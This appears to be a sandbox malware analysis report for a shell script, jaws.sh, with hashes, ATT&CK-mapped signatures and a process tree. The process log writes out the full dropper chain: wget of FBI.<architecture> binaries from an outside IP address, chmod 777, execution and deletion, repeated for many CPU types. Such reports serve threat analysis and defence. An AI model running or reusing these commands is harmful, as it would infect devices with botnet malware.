e579f4644d11462f73605d23f6516203b8889fa35704a92f384568d86a8362ea

Resubmissions

22-08-2022 21:26

220822-1ag81adddp 9

Analysis

max time kernel
0s
max time network
155s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
22-08-2022 21:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

jaws.sh
Size

1KB
MD5

bb622b61445bd51f4d2220f3285f1cab
SHA1

786160fabdf742b2f3afd9cf4d525db3abc9f1f3
SHA256

e579f4644d11462f73605d23f6516203b8889fa35704a92f384568d86a8362ea
SHA512

d6cb82fc6fa835f1a36e459302ed2de47dbaa208356a57b68a765a614bca35f812296f186366137dfcfbe16405951e5435e2418df4511eb1b277af1e22dc5c57

Score

9^/10

discovery

Malware Config

Signatures

Writes file to system bin folder 1 TTPs 1 IoCs

Hijack Execution Flow
T1574

Processes:

cp

description ioc process

/bin/busybox /bin/busybox cp
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.

Dynamic Resolution
T1568

Processes:

description ioc

/etc/resolv.conf /etc/resolv.conf
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.

Processes:

cp

description ioc process

/proc/filesystems /proc/filesystems cp
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.

Processes:

jaws.shcp

description ioc process

/tmp/jaws.sh /tmp/jaws.sh jaws.sh
/tmp/busybox /tmp/busybox cp

description	ioc	process
/bin/busybox	/bin/busybox	cp

description	ioc
/etc/resolv.conf	/etc/resolv.conf

description	ioc	process
/proc/filesystems	/proc/filesystems	cp

description	ioc	process
/tmp/jaws.sh	/tmp/jaws.sh	jaws.sh
/tmp/busybox	/tmp/busybox	cp

/tmp/jaws.sh
/tmp/jaws.sh wget http://37.44.238.187/jaws.sh
1⤵
- Writes file to tmp directory
PID:581

/bin/cp
cp /bin/busybox /tmp/
2⤵
- Writes file to system bin folder
- Reads runtime system information
- Writes file to tmp directory
PID:582

/usr/bin/wget
wget http://37.44.238.187/FBI.i486
2⤵
PID:583

/bin/chmod
chmod 777 FBI.i486
2⤵
PID:585

./FBI.i486
./FBI.i486 jaws.i486.wget
2⤵
PID:586

/bin/rm
rm -rf FBI.i486
2⤵
PID:587

/usr/bin/wget
wget http://37.44.238.187/FBI.x86_64
2⤵
PID:588

/bin/chmod
chmod 777 FBI.x86_64
2⤵
PID:590

./FBI.x86_64
./FBI.x86_64 jaws.x86_64.wget
2⤵
PID:595

/bin/rm
rm -rf FBI.x86_64
2⤵
PID:598

/usr/bin/wget
wget http://37.44.238.187/FBI.i586
2⤵
PID:602

/bin/chmod
chmod 777 FBI.i586
2⤵
PID:604

./FBI.i586
./FBI.i586 jaws.i586.wget
2⤵
PID:605

/bin/rm
rm -rf FBI.i586
2⤵
PID:606

/usr/bin/wget
wget http://37.44.238.187/FBI.i686
2⤵
PID:607

/bin/chmod
chmod 777 FBI.i686
2⤵
PID:609

./FBI.i686
./FBI.i686 jaws.i686.wget
2⤵
PID:610

/bin/rm
rm -rf FBI.i686
2⤵
PID:613

/usr/bin/wget
wget http://37.44.238.187/FBI.mips
2⤵
PID:617

/bin/chmod
chmod 777 FBI.mips
2⤵
PID:619

./FBI.mips
./FBI.mips jaws.mips.wget
2⤵
PID:620

/bin/rm
rm -rf FBI.mips
2⤵
PID:622

/usr/bin/wget
wget http://37.44.238.187/FBI.mipsel
2⤵
PID:623

/bin/chmod
chmod 777 FBI.mipsel
2⤵
PID:625

./FBI.mipsel
./FBI.mipsel jaws.mipsel.wget
2⤵
PID:626

/bin/rm
rm -rf FBI.mipsel
2⤵
PID:627

/usr/bin/wget
wget http://37.44.238.187/FBI.arm
2⤵
PID:628

/bin/chmod
chmod 777 FBI.arm
2⤵
PID:630

./FBI.arm
./FBI.arm jaws.arm.wget
2⤵
PID:631

/bin/rm
rm -rf FBI.arm
2⤵
PID:633

/usr/bin/wget
wget http://37.44.238.187/FBI.arm5
2⤵
PID:634

/bin/chmod
chmod 777 FBI.arm5
2⤵
PID:636

./FBI.arm5
./FBI.arm5 jaws.arm5.wget
2⤵
PID:637

/bin/rm
rm -rf FBI.arm5
2⤵
PID:639

/usr/bin/wget
wget http://37.44.238.187/FBI.arm6
2⤵
PID:640

/bin/chmod
chmod 777 FBI.arm6
2⤵
PID:642

./FBI.arm6
./FBI.arm6 jaws.arm6.wget
2⤵
PID:643

/bin/rm
rm -rf FBI.arm6
2⤵
PID:645

/usr/bin/wget
wget http://37.44.238.187/FBI.arm7
2⤵
PID:646

/bin/chmod
chmod 777 FBI.arm7
2⤵
PID:648

./FBI.arm7
./FBI.arm7 jaws.arm7.wget
2⤵
PID:649

/bin/rm
rm -rf FBI.arm7
2⤵
PID:651

/usr/bin/wget
wget http://37.44.238.187/FBI.ppc
2⤵
PID:652

/bin/chmod
chmod 777 FBI.ppc
2⤵
PID:654

./FBI.ppc
./FBI.ppc jaws.ppc.wget
2⤵
PID:655

/bin/rm
rm -rf FBI.ppc
2⤵
PID:657

/usr/bin/wget
wget http://37.44.238.187/FBI.m68k
2⤵
PID:658

/bin/chmod
chmod 777 FBI.m68k
2⤵
PID:660

./FBI.m68k
./FBI.m68k jaws.m68k.wget
2⤵
PID:661

/bin/rm
rm -rf FBI.m68k
2⤵
PID:662

/usr/bin/wget
wget http://37.44.238.187/FBI.sh4
2⤵
PID:663

/bin/chmod
chmod 777 FBI.sh4
2⤵
PID:665

./FBI.sh4
./FBI.sh4 jaws.sh4.wget
2⤵
PID:666

/bin/rm
rm -rf FBI.sh4
2⤵
PID:668

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hijack Execution Flow

T1574

Privilege Escalation

Hijack Execution Flow

T1574

Defense Evasion

Hijack Execution Flow

T1574

Credential Access

Discovery

Network Service Scanning

T1046

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads